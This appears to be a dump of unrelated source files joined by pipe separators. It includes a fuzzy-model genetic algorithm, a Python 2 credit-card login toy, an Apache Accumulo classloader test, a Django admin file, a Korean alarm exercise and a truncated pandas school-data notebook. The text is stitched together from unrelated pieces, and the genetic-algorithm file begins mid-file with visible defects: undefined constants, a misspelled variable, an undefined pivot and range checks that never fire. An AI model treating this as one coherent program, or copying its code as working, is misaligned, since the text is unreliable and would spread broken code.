DESV_STD_END = 12
PARAM_P_START = 12
PARAM_P_END = 21
PARAM_Q_START = 21
PARAM_Q_END = 30
PARAM_R_START = 30
PARAM_R_END = 39
class FussyParameters():
def __init__(self, cromosome):
X = [
[
cromosome[0], # Median
cromosome[6], # Desv_std
None # Gaussy_values
],
[
cromosome[0], # Median
cromosome[6], # Desv_std
None # Gaussy_values
],
[
cromosome[2], # Median
cromosome[8], # Desv_std
None # Gaussy_values
]
]
Y = [
[
cromosome[3],
cromosome[9],
None
],
[
cromosome[4],
cromosome[10],
None
],
[
cromosome[5],
cromosome[11],
None
]
]
fussy_rules = [
[
cromosome[12], # p
cromosome[21], # q
cromosome[30], # r
X[0], # X
Y[0] # Y
],
[
cromosome[13],
cromosome[22],
cromosome[31],
X[0],
Y[1]
],
[
cromosome[14],
cromosome[23],
cromosome[32],
X[0],
Y[2]
],
[
cromosome[15],
cromosome[24],
cromosome[33],
X[1],
Y[0]
],
[
cromosome[16],
cromosome[25],
cromosome[34],
X[1],
Y[1]
],
[
cromosome[17],
cromosome[26],
cromosome[35],
X[1],
Y[2]
],
[
cromosome[18],
cromosome[27],
cromosome[36],
X[2],
Y[0]
],
[
cromosome[19],
cromosome[28],
cromosome[37],
X[2],
Y[1]
],
[
cromosome[20],
cromosome[29],
cromosome[38],
X[2],
Y[2]
]
]
self.X = X
self.Y = Y
self.fussy_rules = fussy_rules
class PSmodel():
def __init__(self, population_size, cromosome_size, target_values, resolutions, generations, bottom_limit, top_limit, step, competidors_percentage=0.05, mutation_percentage=0, gen_bit_length=8, elitism=False, graph_generations=False, debuglevel=0):
# Validate population size to be an even number
if population_size % 2 == 1:
raise Exception("Population size must be an even number")
self.population_size = population_size
# Validate the competidors percentage to be between 1 and 100
if competidors_percentage < 0.1 and competidors_percentage > 0.99:
raise Exception("Competidor percentage must be a number between 0.1 and 0.99")
self.competidors_percentage = competidors_percentage
if mutation_percentage < 0 and mutation_percentage > 1:
raise Exception("Mutations percentage must be a number between 0 and 1")
self.total_mutations = int(population_size * mutation_percentage)
self.cromosome_size = cromosome_size
self.generations = generations
self.gen_bit_length = gen_bit_length
self.resolutions = resolutions
self.elitism = elitism
self.x_bottom_limit = bottom_limit
self.x_top_limit = top_limit
self.x_step = step
self.graph_generations = graph_generations
self.debuglevel = debuglevel
self.population = None
self.fittiests_history = None
self.fittiest = None
print(f"Target = {target_values}")
self.target = target_values
@staticmethod
def get_y(x, cromosome):
# return cromosome[A] * (cromosome[B] * sin(x/cromosome[C]) + cromosome[D] * sin(x/cromosome[E])) + cromosome[F] * x - cromosome[D]
return cromosome[A] * (cromosome[B] * sin(x/cromosome[C]) + cromosome[D] * sin(x/cromosome[E])) + cromosome[F] * x - cromosome[D]
@staticmethod
def gen_to_binary(gen, gen_bit_length):
format_schema = "{0:" + "{0:02d}".format(gen_bit_length) + "b}"
return format_schema.format(gen)
@staticmethod
def bin_to_dec(binary_value):
return int(binary_value, 2)
@staticmethod
def flip_bit(bit):
if bit == "1":
return "0"
return "1"
@staticmethod
def is_valid_cromosome(cromosome):
return not 0 in cromosome[DESV_STD_START:DESV_STD_END]
@staticmethod
def resolutionate(values, resolution):
result = [0] * len(values)
for i in range(len(values)):
result[i] = values[i] / resolution
return result
def get_resolutionated_cromosome(self, cromosome):
resolutionated_cromosome = self.resolutionate(cromosome[MEDIAN_START:MEDIAN_END], self.resolutions[RESOLUTION_MEDIAN])
resolutionated_cromosome += self.resolutionate(cromosome[DESV_STD_START:DESV_STD_END], self.resolutions[RESOLUTION_DESV_STD])
resolutionated_cromosome += self.resolutionate(cromosome[PARAM_P_START:PARAM_P_END], self.resolutions[RESOLUTION_P])
resolutionated_cromosome += self.resolutionate(cromosome[PARAM_Q_START:PARAM_Q_END], self.resolutions[RESOLUTION_Q])
resolutionated_cromosome += self.resolutionate(cromosome[PARAM_R_START:PARAM_R_END], self.resolutions[RESOLUTION_R])
return resolutionated_cromosome
def get_function_values(self, cromosome):
resolutionated_cromosome = self.get_resolutionated_cromosome(cromosome)
parameters = FussyParameters(resolutionated_cromosome)
fussy_model = GaussyModel(
x_elements = parameters.X,
y_elements = parameters.Y,
rules = parameters.fussy_rules,
step = self.x_step,
step_range = [self.x_bottom_limit,self.x_top_limit],
logger = logger,
debuglevel = self.debuglevel)
return fussy_model.fit()
def evaluate(self, cromosome):
error = 0
cromosome_values = self.get_function_values(cromosome)
for j in range(len(self.target)):
for i in range(len(self.target[j])):
error += abs(cromosome_values[j][i] - self.target[j][i])
return error
def log(self, text, debuglevel=0, logtype="INFO"):
if self.debuglevel <= debuglevel:
msg = "{} - {}".format(logtype, text)
print(msg)
logger.write(msg + '\n')
def generate_population(self):
'''
Generate a population where each individual consists of an array of 3 numbers which can go from 0 to 2^gen_bit_length-1 (gen_bit_length is received as a parameter, default=8)
'''
max_value = 2 ** self.gen_bit_length
temp_population = [0] * self.population_size
for i in range(self.population_size):
temp_population[i] = [0] * (self.cromosome_size + 1)
valid_cromosome = False
while not valid_cromosome:
for j in range(self.cromosome_size):
temp_population[i][j] = random.randrange(0, max_value)
valid_cromosome = PSmodel.is_valid_cromosome(temp_population[i])
return temp_population
def get_fittiest(self):
fittiest = None
for cromosome in self.population:
if fittiest == None or cromosome[-1] < fittiest[-1]:
fittiest = cromosome
return fittiest
def calculate_aptitud_function(self):
'''
Calculate the aptitud function for each cromosome and store the result in the last position of the list
'''
for cromosome in self.population:
cromosome[-1] = self.evaluate(cromosome)
def tournament_compete(self, total_competidors):
'''
Get an 'n' number of 'randomly' selected cromosomes and get the one with the lowest value of the aptitud function
'n' is given by the parameter 'total_competidors'
'''
self.log("-----start of tournament with {:d} competidors-----".format(total_competidors))
winner = None
for i in range(total_competidors):
rndindex = random.randrange(self.population_size)
self.log("{}".format(str(self.population[rndindex])))
# If there's still no winner (first item in the loop) just assign it to be the temporal winner
if winner == None or self.population[rndindex][-1] < winner[-1]:
winner = self.population[rndindex]
continue
self.log("Winner = {}".format(str(winner)))
self.log("-----end of tournament-----")
return winner
def tournament(self):
'''
Make a tournament to get a new list of 'n' cromosomes. 'n' is the total population size / 2.
The self.logic to get the cromosomes for this new list is delegated to the method 'tournament_compete'
'''
total_competidors = int(self.population_size * self.competidors_percentage)
total_winners = int(self.population_size / 2)
winners = [0] * total_winners
for i in range(total_winners):
winners[i] = self.tournament_compete(total_competidors)
self.log('------winners tournament----')
self.print_population(winners)
return winners
def breeding_operator1(self, father, mother):
'''
This breeding method will get a pivot randomely and will use it to 'break' each cromosome (father's and mother's cromosomes)
Child1 will consist on father's binary value from position 0 to pivot, and mother's binary value from pivot to last position
Child2, on the other hand, will consist on mothers's binary value from position 0 to pivot, and fathers's binary value from pivot to last position
'''
def cromosome_to_binary(cromosome, gen_bit_length):
result = ""
for i in range(len(cromosome)-1):
result += PSmodel.gen_to_binary(cromosome[i], gen_bit_length)
return result
def binary_to_cromosome(binary, gen_bit_length):
result = []
for i in range(0, len(binary), gen_bit_length):
result.append(PSmodel.bin_to_dec(binary[i:i+gen_bit_length]))
return result
# Get random pivot which will divide the cromosome
pivot = random.randrange(1, self.gen_bit_length * self.cromosome_size)
# Convert each cromsome to it's binary equivalent. This get the binary value of each gen and will merge them into one
father_binary = cromosome_to_binary(father, self.gen_bit_length)
mother_binary = cromosome_to_binary(mother, self.gen_bit_length)
# Do the breeding
child1_binary = father_binary[:pivot] + mother_binary[pivot:]
child2_binary = mother_binary[:pivot] + father_binary[pivot:]
# Split the final binary value into each gen
child1 = binary_to_cromosome(child1_binary, self.gen_bit_length) + [0]
child2 = binary_to_cromosome(child2_binary, self.gen_bit_length) + [0]
self.log("{} & {} ({:d})= {} & {}".format(str(father), str(mother), pivot, str(child1), str(child2)), 2)
return child1, child2
def breeding_operator2(self, father, mother):
def cromosome_to_binary(cromosome, gen_bit_length):
result = ""
for i in range(len(cromosome)-1):
result += PSmodel.gen_to_binary(cromosome[i], gen_bit_length)
return result
def binary_to_cromosome(binary, gen_bit_length):
result = []
for i in range(0, len(binary), gen_bit_length):
result.append(PSmodel.bin_to_dec(binary[i:i+gen_bit_length]))
return result
# Get random pivot which will divide the cromosome
pivot1 = random.randrange(1, self.gen_bit_length * self.cromosome_size)
pivot2 = random.randrange(1, self.gen_bit_length * self.cromosome_size)
if pivot1 > pivot2:
tmp = pivot1
pivot1 = pivot2
pivot2 = tmp
# Convert each cromsome to it's binary equivalent. This get the binary value of each gen and will merge them into one
father_binary = cromosome_to_binary(father, self.gen_bit_length)
mother_binary = cromosome_to_binary(mother, self.gen_bit_length)
# Do the breeding
child1_binary = father_binary[:pivot1] + mother_binary[pivot1:pivot2] + father_binary[pivot2:]
child2_binary = mother_binary[:pivot1] + father_binary[pivot1:pivot2] + mother_binary[pivot2:]
# Split the final binary value into each gen
child1 = binary_to_cromosome(child1_binary, self.gen_bit_length) + [0]
child2 = binary_to_cromosome(child2_binary, self.gen_bit_length) + [0]
self.log("{} & {} ({:d})= {} & {}".format(str(father), str(mother), pivot, str(child1), str(child2)), 2)
return child1, child2
def breether_factory(self, father, mother):
i = random.randrange(0, 100)
# i = 20
if i > 20:
return self.breeding_operator1(father, mother)
else:
return self.breeding_operator1(father, mothers)
def breed(self, fathers, mothers):
'''
select the breeding method
'''
self.log('------breeding-------')
newpopulation = [0] * self.population_size
for i in range(int(self.population_size/2)):
valid_children = False
while not valid_children:
child1, child2 = self.breeding_operator1(fathers[i], mothers[i])
valid_children = PSmodel.is_valid_cromosome(child1) and PSmodel.is_valid_cromosome(child2)
newpopulation[i*2], newpopulation[i*2+1] = child1, child2
self.log('------end of breeding-------')
return newpopulation
def apply_elitism(self, fathers, mothers, children):
self.log("**** Applying elitism ****", debuglevel=0)
tmp = fathers + mothers + children
self.print_population(tmp, debuglevel=0)
self.log("Sorted population", debuglevel=0)
tmp = sorted(tmp, key=lambda x:x[-1])
self.print_population(tmp, debuglevel=0)
result = tmp[:self.population_size]
self.log("**** Elitism result ****")
self.print_population(result, debuglevel=0)
self.log("**** End of Elitism ****")
return result
def mutate_gen(self, gen, bit_index):
binary = list(PSmodel.gen_to_binary(gen, self.gen_bit_length))
binary[bit_index] = PSmodel.flip_bit(binary[bit_index])
binary = "".join(binary)
return PSmodel.bin_to_dec(binary)
def mutate_cromosome(self, cromosome, gen_index, bit_index=None):
# Get which bit to mutate
if bit_index == None:
bit_index = random.randrange(0, self.gen_bit_length)
# Apply mutation to gen
cromosome[gen_index] = self.mutate_gen(cromosome[gen_index], bit_index)
return cromosome
def mutation(self):
for i in range(self.total_mutations):
# Get which cromosome to mutate
rnd_index = random.randrange(0, self.population_size)
selected_cromosome = self.population[rnd_index]
log_builder = f"Cromosome mutated from {selected_cromosome} to -> "
# Get which gen to mutate from the cromosome
rnd_gen_index = random.randrange(0, self.cromosome_size)
# Apply mutation
mutated_cromosome = self.mutate_cromosome(selected_cromosome, rnd_gen_index)
while(not PSmodel.is_valid_cromosome(mutated_cromosome)):
mutated_cromosome = self.mutate_cromosome(selected_cromosome, rnd_gen_index)
self.population[rnd_index] = mutated_cromosome
self.log(log_builder + str(selected_cromosome), 1)
def graph_history(self):
if not plt_found:
print("Matplotlib libary not found. Install it to see the graph. Install: 'pip install matplotlib'")
return
plt.rcParams.update({'font.size': 6})
plt.plot([i+1 for i in range(self.generations)], self.fittiests_history)
plt.ylabel('Error')
plt.xlabel('Generations')
plt.show()
def plot_data(self, generation):
fig = plt.figure(figsize=plt.figaspect(0.3))
fig.suptitle(f"Generation #{generation}")
X = np.arange(self.x_bottom_limit, self.x_top_limit, self.x_step)
Y = np.arange(self.x_bottom_limit, self.x_top_limit, self.x_step)
X, Y = np.meshgrid(X, Y)
# Target
ax = fig.add_subplot(1, 3, 1, projection='3d')
ax.set_title('Target')
ax.set_xlabel('Sugar')
ax.set_ylabel('Lemon')
Z = np.array(self.target)
surf = ax.plot_surface(X, Y, Z, rstride=1, cstride=1, linewidth=0, antialiased=False)
# Generation fittiest
ax = fig.add_subplot(1, 3, 2, projection='3d')
ax.set_title('Current')
ax.set_xlabel('Sugar')
ax.set_ylabel('Lemon')
Z = np.array(self.get_function_values(self.fittiest))
surf = ax.plot_surface(X, Y, Z, rstride=1, cstride=1, linewidth=0, antialiased=False)
# History
ax = fig.add_subplot(1, 3, 3)
ax.set_title('Error history')
ax.set_xlabel('Generation')
ax.set_ylabel('Error')
ax.plot([i+1 for i in range(generation)], self.fittiests_history)
# fig.tight_layout()
plt.show()
def fit(self):
'''
Main method of the algorithm. This method will coordinate each step to make the ordinary genetic algorithm work
'''
# Initialize aptituds list. This will store all the values of the aptitud function
self.aptituds = [0] * self.population_size
self.fittiests_history = []
# Get initial population randomly and store it in the global variable
self.population = self.generate_population()
# Calculate the aptitud function for each cromosome
self.calculate_aptitud_function()
for i in range(self.generations):
# Get a new list of cromosomes with a tournament
fathers = self.tournament()
mothers = self.tournament()
self.log('----fathers----', 1)
self.print_population(fathers, 1)
self.log('----mothers----', 1)
self.print_population(mothers, 1)
# from the winners of the tournament, get new cromosomes by a 'breeding' process and overwrite the actual population with the new population originated from the 'winners'
self.population = self.breed(fathers, mothers)
# Apply mutations
self.mutation()
# Calculate the aptitud function for each new cromosome
self.calculate_aptitud_function()
# Apply elitism if required
if self.elitism:
self.population = self.apply_elitism(fathers, mothers, self.population)
# Get fittiest to make the graph
self.fittiest = self.get_fittiest()
self.fittiests_history.append(self.fittiest[-1])
# self.graph_history()
self.log(f"---------Generation {i+1}", 2)
self.print_population(debuglevel=2)
if self.graph_generations:
self.plot_data(generation=i+1)
self.log(self.fittiest, 5, f"Generation {i+1}")
self.log(self.fittiest[-1], 5, "Error")
self.log(self.fittiests_history, 2)
# self.plot_functions(generation_fittiest, i)
self.plot_data(generation=i+1)
return self.fittiest
def print_population(self, population=None, debuglevel=0):
'''
Used for debug
'''
if population == None:
population = self.population
for i in range(len(population)):
self.log(str(population[i]), debuglevel) |
#!/bin/env python
#_*_coding:utf-8_*_
#Author:swht
#E-mail:qingbo.song@gmail.com
#Date:2015.11.24
#Version:V0.0.1
import centerclass
import bankmanage
import main
import time
bankdict = {'ID':1018584989,'Pass':123456,'Yue':15000}
def bank_login():
centerclass.bank.Print()
flag = 0
while flag <= 3:
creditId = raw_input("请输入你的信用卡号 :").strip()
creditPass = raw_input(u"请输入你的信用卡密码:").strip()
#判断输入的字符串是否为纯数字
if creditId.isdigit():
ifBankId(creditId,creditPass,flag)
else:
print "你输入的信用卡号类型不正确,请重新输入!"
flag += 1
print "你输入的错误次数已达3次,程序将退出!"
main.welcome()
def ifBankId(creditId,creditPass,flag):
if bankdict['ID'] == int(creditId):
if bankdict['Pass'] == int(creditPass):
LoginBankSucess(creditId)
else:
# if userId == 'quit':
# print "系统即将退出!"
# time.sleep(1)
# main.welcome()
# else:
# flag += 1
# print "你输入的密码有误,请重新输入!"
flag += 1
print "你输入的密码有误,请重新输入!"
else:
flag += 1
print "你输入的信用卡号有误,请重新输入!"
def LoginBankSucess(creditId):
flag = 0
while flag <= 5:
print '''
\t=========欢迎用户%s登录到信用卡中心=========
\t\t1.取现\t\t2.查询\t\t
\t\t3.还款\t\t4.转账\t\t
\t\t5.购物\t\t6.退出\t\t
''' % creditId
choicebank = raw_input('''请选择指令:''').strip()
if len(choicebank) == 0:
flag += 1
print "指令不能为空,请重新输入![1-6]"
else:
choicebank = int(choicebank)
if choicebank >= 1 and choicebank <= 6:
if choicebank == 1:
bankmanage.draw()
if choicebank == 2:
bankmanage.check()
if choicebank == 3:
bankmanage.repayment()
if choicebank == 4:
bankmanage.transfer()
if choicebank == 5:
bankmanage.shoppay()
if choicebank == 6:
print '程序即将退出信用卡中心,欢迎下次使用!'
time.sleep(1)
main.welcome()
else:
flag += 1
print "你输入的指令不在规定范围内,请重新输入![1-6]"
print "你输入的错误次数已达5次!系统将退出!"
time.sleep(1)
bank_login() |
from itertools import combinations
def solution(numbers):
return sorted(set([sum(i) for i in combinations(numbers, 2)])) |
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import logging
import unittest
import time
import glob
from aggregation import AggregationTest
from TestUtils import ACCUMULO_HOME
log = logging.getLogger('test.auto')
class DynamicClassloader(AggregationTest):
"Start a clean accumulo, use an newly created aggregator, verify the data is aggregated"
order = 25
def runWait(self, cmd):
handle = self.runOn(self.masterHost(), ['bash', '-c', cmd]);
self.wait(handle)
def runTest(self):
import string, random
rand = list(string.hexdigits)
random.shuffle(rand)
rand = ''.join(rand[0:4])
#Make sure paths exists for test
if not os.path.exists(os.path.join(ACCUMULO_HOME, 'target','dynamictest%s' % rand, 'accumulo','test')):
os.makedirs(os.path.join(ACCUMULO_HOME, 'target', 'dynamictest%s' % rand, 'accumulo', 'test'))
fp = open(os.path.join(ACCUMULO_HOME, 'target', 'dynamictest%s' % rand, 'accumulo', 'test', 'SummingCombiner%s.java' % rand), 'wb')
fp.write('''
package accumulo.test;
import java.util.Iterator;
import org.apache.accumulo.core.data.Key;
import org.apache.accumulo.core.iterators.LongCombiner;
public class SummingCombiner%s extends LongCombiner {
@Override
public Long typedReduce(Key key, Iterator<Long> iter) {
long sum = 0;
while (iter.hasNext()) {
sum = safeAdd(sum, iter.next());
}
return sum;
}
@Override
public IteratorOptions describeOptions() {
IteratorOptions io = super.describeOptions();
io.setName("sum");
io.setDescription("SummingCombiner interprets Values as Longs and adds them together. A variety of encodings (variable length, fixed length, or string) are available");
return io;
}
}
''' % rand)
fp.close()
handle = self.runOn(self.masterHost(), [self.accumulo_sh(), 'classpath'])
out, err = handle.communicate()
parts = []
for line in out.split('\n'):
line = line.strip()
if line.startswith("file:"):
parts.append(line[5:])
path = ':'.join(parts)
self.runWait("javac -cp %s:%s %s" % (
path,
os.path.join(ACCUMULO_HOME,'src','core','target','classes'),
os.path.join(ACCUMULO_HOME,'target','dynamictest%s' % rand,'accumulo','test','SummingCombiner%s.java' % rand)
))
self.runWait("jar -cf %s -C %s accumulo/" % (
os.path.join(ACCUMULO_HOME,'lib','ext','Aggregator%s.jar' % rand),
os.path.join(ACCUMULO_HOME,'target','dynamictest%s' % rand)
))
self.sleep(1)
# initialize the database
combiner = 'accumulo.test.SummingCombiner%s' % rand
cmd = 'createtable --no-default-iterators test\nsetiter -t test -p 10 -scan -minc -majc -n testcombineriter -class '+ combiner+'\n\ncf\n\nSTRING'
out, err, code = self.rootShell(self.masterHost(),"%s\n" % cmd)
self.assert_(code == 0)
# insert some rows
log.info("Starting Test Ingester")
cmd = ''
for i in range(10):
cmd += 'table test\ninsert row1 cf col1 %d\n' % i
out, err, code = self.rootShell(self.masterHost(), cmd)
self.assert_(code == 0)
self.checkSum()
self.shutdown_accumulo()
self.start_accumulo()
self.checkSum()
os.remove(os.path.join(ACCUMULO_HOME, 'lib','ext','Aggregator%s.jar' % rand))
def suite():
result = unittest.TestSuite()
result.addTest(DynamicClassloader())
return result
|
from django.contrib import admin
from .models import *
# Register your models here.
admin.site.register(Machine)
admin.site.register(Maker)
admin.site.register(Raw)
admin.site.register(Model) |
# 상근이는 매일 아침 알람을 듣고 일어난다.
# 알람을 듣고 바로 일어나면 다행이겠지만,
# 항상 조금만 더 자려는 마음 때문에 매일 학교를 지각하고 있다.
# 상근이는 모든 방법을 동원해보았지만,
# 조금만 더 자려는 마음은 그 어떤 것도 없앨 수가 없었다.
# 이런 상근이를 불쌍하게 보던 창영이는 자신이 사용하는 방법을 추천해 주었다.
# 바로 "45분 일찍 알람 설정하기"이다.
# 이 방법은 단순하다.
# 원래 설정되어 있는 알람을 45분 앞서는 시간으로 바꾸는 것이다.
# 어차피 알람 소리를 들으면, 알람을 끄고 조금 더 잘 것이기 때문이다.
# 이 방법을 사용하면 매일 아침 더 잤다는 기분을 느낄 수 있고,
# 학교도 지각하지 않게 된다.
# 현재 상근이가 설정한 알람 시각이 주어졌을 때 창영이의 방법을 사용한다면,
# 이를 언제로 고쳐야 하는지 구하는 프로그램을 작성하시오.
# 현재 상근이의 알람 시간 H시 M분 입력
H,M = map(int, input().split())
# 45분 앞서는 시간 구하기
M=M-45
if M<0:
H-=1
M+=60
if H<0:
H+=24
print("%d %d"%(H,M))
|
print('hola')
print('Hola Universo... ¿cómo estás?')
print('Hola Universo hehe')
|
# coding: utf-8
# # PyCity Schools Analysis
#
# * As a whole, schools with higher budgets, did not yield better test results. By contrast, schools with higher spending per student actually (\$645-675) underperformed compared to schools with smaller budgets (<\$585 per student).
#
# * As a whole, smaller and medium sized schools dramatically out-performed large sized schools on passing math performances (89-91% passing vs 67%).
#
# * As a whole, charter schools out-performed the public district schools across all metrics. However, more analysis will be required to glean if the effect is due to school practices or the fact that charter schools tend to serve smaller student populations per school.
# ---
# ### Note
# * Instructions have been included for each segment. You do not have to follow them exactly, but they are included to help you think through the steps.
# In[177]:
# Dependencies and Setup
import pandas as pd
import numpy as np
# File to Load (Remember to Change These)
school_data_to_load = "Resources/schools_complete.csv"
student_data_to_load = "Resources/students_complete.csv"
# Read School and Student Data File and store into Pandas Data Frames
school_data = pd.read_csv(school_data_to_load)
student_data = pd.read_csv(student_data_to_load)
# Combine the data into a single dataset
school_data_complete = pd.merge(student_data, school_data, how="left", on=["school_name", "school_name"])
# ## District Summary
#
# * Calculate the total number of schools
#
# * Calculate the total number of students
#
# * Calculate the total budget
#
# * Calculate the average math score
#
# * Calculate the average reading score
#
# * Calculate the overall passing rate (overall average score), i.e. (avg. math score + avg. reading score)/2
#
# * Calculate the percentage of students with a passing math score (70 or greater)
#
# * Calculate the percentage of students with a passing reading score (70 or greater)
#
# * Create a dataframe to hold the above results
#
# * Optional: give the displayed data cleaner formatting
# In[178]:
total_schools = school_data_complete['school_name'].nunique() # Produces *TOTAL NUMBER OF SCHOOLS*
total_students = school_data_complete['Student ID'].nunique() # Produces *TOTAL NUMBER OF STUDENTS*
df_school_budgets = school_data_complete['budget'].unique() # Stores all individual school budgets as array
total_budget = df_school_budgets.sum() # Sums individual school budgets // still need to format as $$
avg_math_score_dist = school_data_complete['math_score'].mean() #
avg_read_score_dist = school_data_complete['reading_score'].mean() #
math_pass = school_data_complete.loc[school_data_complete['math_score'] > 69]
read_pass = school_data_complete.loc[school_data_complete['reading_score'] > 69]
percent_pass_math = (len(math_pass) / total_students) * 100
percent_pass_read = (len(read_pass) / total_students) * 100
overall_passing_Rate = (avg_math_score_dist + avg_read_score_dist)/2
#print(total_schools)
#print(total_students)
#print(total_budget)
#print(avg_math_score_dist)
#print(avg_read_score_dist)
#print(percent_pass_math)
#print(percent_pass_read)
#print(overall_passing_Rate)
#school_data_complete.head() # Test Run to see what the data frame looks like
# In[179]:
district_data = pd.DataFrame({'Total Schools': [total_schools],
'Total Students': [total_students],
'Total Budget': [total_budget],
'Average Math Score': [avg_math_score_dist],
'Average Reading Score': [avg_read_score_dist],
'% Passing Math': [percent_pass_math],
'% Passing Reading': [percent_pass_read],
'% Overall Passing Rate': [overall_passing_Rate],
})
district_data['Total Budget'] = district_data['Total Budget'].map("${:,.2f}".format)
district_data['Total Students'] = district_data['Total Students'].apply('{:,}'.format)
district_data
# ## School Summary
# * Create an overview table that summarizes key metrics about each school, including:
# * School Name
# * School Type
# * Total Students
# * Total School Budget
# * Per Student Budget
# * Average Math Score
# * Average Reading Score
# * % Passing Math
# * % Passing Reading
# * Overall Passing Rate (Average of the above two)
#
# * Create a dataframe to hold the above results
# ## Top Performing Schools (By Passing Rate)
# * Sort and display the top five schools in overall passing rate
# In[180]:
school_group = school_data_complete.groupby('school_name')
print(school_group)
# In[181]:
school_type = school_data_complete[['school_name', 'type']]
school_type = school_type.drop_duplicates()
school_type = school_type.reset_index()
school_type = school_type.drop(columns=['index'])
school_type
# In[182]:
student_total = pd.DataFrame(school_group['Student ID'].count())
student_total = student_total.reset_index()
student_total
# In[183]:
school_budget = school_data_complete[['school_name', 'budget']]
school_budget = school_budget.drop_duplicates()
school_budget = school_budget.reset_index()
school_budget = school_budget.drop(columns=['index'])
school_budget
# In[184]:
by_school_data_math = school_data_complete.groupby(['school_name'])
avg_math_score_school = by_school_data_math['math_score'].mean()
avg_math_score_school = pd.DataFrame([avg_math_score_school])
avg_math_score_school = avg_math_score_school.transpose()
avg_math_score_school = avg_math_score_school.rename(columns = {'math_score':'Average Math Score'})
avg_math_score_school = avg_math_score_school.reset_index()
avg_math_score_school
# In[185]:
by_school_data_read = school_data_complete.groupby(['school_name'])
avg_read_score_school = by_school_data_read['reading_score'].mean()
avg_read_score_school = pd.DataFrame([avg_read_score_school])
avg_read_score_school = avg_read_score_school.transpose()
avg_read_score_school = avg_read_score_school.rename(columns = {'reading_score':'Average Reading Score'})
avg_read_score_school = avg_read_score_school.reset_index()
avg_read_score_school
# In[186]:
math_pass = school_data_complete.loc[school_data_complete['math_score'] > 69]
math_pass_byschool = math_pass['school_name'].value_counts()
math_pass_byschool = pd.DataFrame(math_pass_byschool)
math_pass_byschool = math_pass_byschool.rename(columns = {'school_name':'Pass Math'})
math_pass_byschool = math_pass_byschool.reset_index()
math_pass_byschool = math_pass_byschool.rename(columns = {'index':'school_name'})
math_pass_byschool
# In[187]:
read_pass = school_data_complete.loc[school_data_complete['reading_score'] > 69]
read_pass
read_pass_byschool = read_pass['school_name'].value_counts()
read_pass_byschool = pd.DataFrame(read_pass_byschool)
read_pass_byschool = read_pass_byschool.rename(columns = {'school_name':'Pass Reading'})
read_pass_byschool = read_pass_byschool.reset_index()
read_pass_byschool = read_pass_byschool.rename(columns = {'index':'school_name'})
read_pass_byschool
# In[188]:
school_data_mergeseries = pd.merge(school_type, student_total, on=["school_name"])
school_data_mergeseries = pd.merge(school_data_mergeseries, school_budget, on=["school_name"])
school_data_mergeseries = pd.merge(school_data_mergeseries, avg_math_score_school, on=["school_name"])
school_data_mergeseries = pd.merge(school_data_mergeseries, avg_read_score_school, on=["school_name"])
school_data_mergeseries = pd.merge(school_data_mergeseries, math_pass_byschool, on=["school_name"])
school_data_summaryfile = pd.merge(school_data_mergeseries, read_pass_byschool, on=["school_name"])
school_data_summaryfile
# In[189]:
school_data_summaryfile['Per Student Budget'] = (school_data_summaryfile['budget'] / school_data_summaryfile['Student ID'])
school_data_summaryfile['% Passing Math'] = (school_data_summaryfile['Pass Math'] / school_data_summaryfile['Student ID']) * 100
school_data_summaryfile['% Passing Reading'] = (school_data_summaryfile['Pass Reading'] / school_data_summaryfile['Student ID']) * 100
school_data_semi_clean = school_data_summaryfile.drop(columns=['Pass Math', 'Pass Reading'])
school_data_semi_clean['% Overall Passing Rate'] = (school_data_semi_clean['% Passing Reading'] + school_data_semi_clean['% Passing Math']) / 2
school_data_semi_clean
# In[190]:
school_data_col_rename = school_data_semi_clean.rename(columns = {'type':'School Type', 'Student ID':'Total Students', 'budget':'Total School Budget'})
school_data_col_rename
# In[191]:
school_data_semi_arranged = school_data_col_rename[['school_name','School Type','Total Students','Total School Budget', 'Per Student Budget', 'Average Math Score', 'Average Reading Score', '% Passing Math', '% Passing Reading', '% Overall Passing Rate']]
school_data_semi_final = school_data_semi_arranged.set_index(['school_name'])
school_data_semi_final
# In[192]:
school_data_finalreport = school_data_semi_final.sort_values('% Overall Passing Rate',ascending=False)
school_data_finalreport.head()
# ## Bottom Performing Schools (By Passing Rate)
# * Sort and display the five worst-performing schools
# In[193]:
school_data_finalreport = school_data_finalreport.sort_values('% Overall Passing Rate',ascending=True)
school_data_finalreport.head()
# ## Math Scores by Grade
# * Create a table that lists the average Reading Score for students of each grade level (9th, 10th, 11th, 12th) at each school.
#
# * Create a pandas series for each grade. Hint: use a conditional statement.
#
# * Group each series by school
#
# * Combine the series into a dataframe
#
# * Optional: give the displayed data cleaner formatting
# In[194]:
school_data_complete.head()
# In[195]:
ninth_grade = school_data_complete.loc[school_data_complete['grade'] == '9th']
ninth_grade = ninth_grade[['school_name','grade','math_score']]
ninth_grade_math_avg = ninth_grade.groupby(['school_name']).mean()
# In[196]:
tenth_grade = school_data_complete.loc[school_data_complete['grade'] == '10th']
tenth_grade = tenth_grade[['school_name','grade','math_score']]
tenth_grade_math_avg = tenth_grade.groupby(['school_name']).mean()
# In[197]:
eleventh_grade = school_data_complete.loc[school_data_complete['grade'] == '11th']
eleventh_grade = eleventh_grade[['school_name','grade','math_score']]
eleventh_grade_math_avg = eleventh_grade.groupby(['school_name']).mean()
# In[198]:
twelveth_grade = school_data_complete.loc[school_data_complete['grade'] == '12th']
twelveth_grade = twelveth_grade[['school_name','grade','math_score']]
twelveth_grade_math_avg = twelveth_grade.groupby(['school_name']).mean()
# In[199]:
school_math_by_grade = pd.merge(ninth_grade_math_avg, tenth_grade_math_avg, on=["school_name"])
school_math_by_grade = school_math_by_grade.rename(columns={'math_score_x':'9th','math_score_y':'10th'} )
school_math_by_grade = pd.merge(school_math_by_grade, eleventh_grade_math_avg, on=["school_name"])
school_math_by_grade = pd.merge(school_math_by_grade, twelveth_grade_math_avg, on=["school_name"])
school_math_by_grade = school_math_by_grade.rename(columns={'math_score_x':'11th','math_score_y':'12th'} )
school_math_by_grade
# ## Reading Score by Grade
# * Perform the same operations as above for reading scores
# In[200]:
ninth_grade = school_data_complete.loc[school_data_complete['grade'] == '9th']
ninth_grade = ninth_grade[['school_name','grade','reading_score']]
ninth_grade_read_avg = ninth_grade.groupby(['school_name']).mean()
# In[201]:
